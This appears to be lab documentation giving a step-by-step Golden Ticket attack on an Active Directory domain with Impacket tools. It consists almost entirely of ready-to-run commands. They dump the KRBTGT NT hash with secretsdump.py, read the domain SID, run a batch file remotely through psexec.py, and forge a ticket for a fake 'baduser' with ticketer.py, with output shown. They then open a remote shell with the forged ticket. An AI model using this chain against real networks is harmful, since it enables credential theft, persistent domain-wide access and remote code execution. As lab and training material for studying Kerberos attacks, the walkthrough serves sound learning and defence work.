Golden Ticket
Golden Ticket
This document covers how to create a Golden Ticket. An Active Directory
Domain server is required for this to work. Connected clients are useful
but not required.
Creating the Ticket
To create a Golden Ticket the NT Hash for KRBTGT will need to be aquired
as well as the Domain SID. All this can easily be done with Impacket.
KRBTGT NT Hash
Lets start off by getting the KRBTGT hash. The following script will
write our desired information to a file called win2016 in the ~/
directory.
secretsdump.py Administrator:vagrant@192.168.64.133 | grep krbtgt | grep ::: > ~/win2016; cat ~/win2016
Domain SID
To get the domain SID use lookupsid.py and grep to filter out just the
information needed. Again that information is writen to the win2016
file.
lookupsid.py Administrator:vagrant@192.168.64.133 | grep "Domain SID" >> ~/win2016; cat ~/win2016
Domain Name
There are times when we forget which domain we are on. To limit errors
we will not assume the domain name but rather get it from the machine.
echo "powershell Get-WmiObject Win32_ComputerSystem" > ~/GetDomain.bat
Now execute this bat file on the target.
psexec.py Administrator:vagrant@192.168.64.133 -c ~/GetDomain.bat | grep Domain >> ~/win2016; cat ~/win2016
Create Ticket
With all the nessassary data create a ticket.
ticketer.py -nthash 4031b5ae4b9defa1f411f26610493e0c -domain-sid S-1-5-21-126282473-2140987555-3925513934 -domain Win2016.local baduser
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for Win2016.local/baduser
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in baduser.ccache
Use the Ticket
To use the ticket with psexec.py the ticket needs to be exported.
Export the Ticket
The ticket will need to be exported to be able to use it with psexec.py.
echo "export KRB5CCNAME=/vagrant/docs/baduser.ccache" >> ~/.bashrc
. ~/.bashrc
tail ~/.bashrc
Use the Ticket With Psexec
Below we use the ticket against Win2016.
export KRB5CCNAME=/vagrant/docs/baduser.ccache; psexec.py -dc-ip 192.168.64.133 -target-ip 192.168.64.133 -no-pass -k Win2016.local/baduser@Win2016.Win2016.local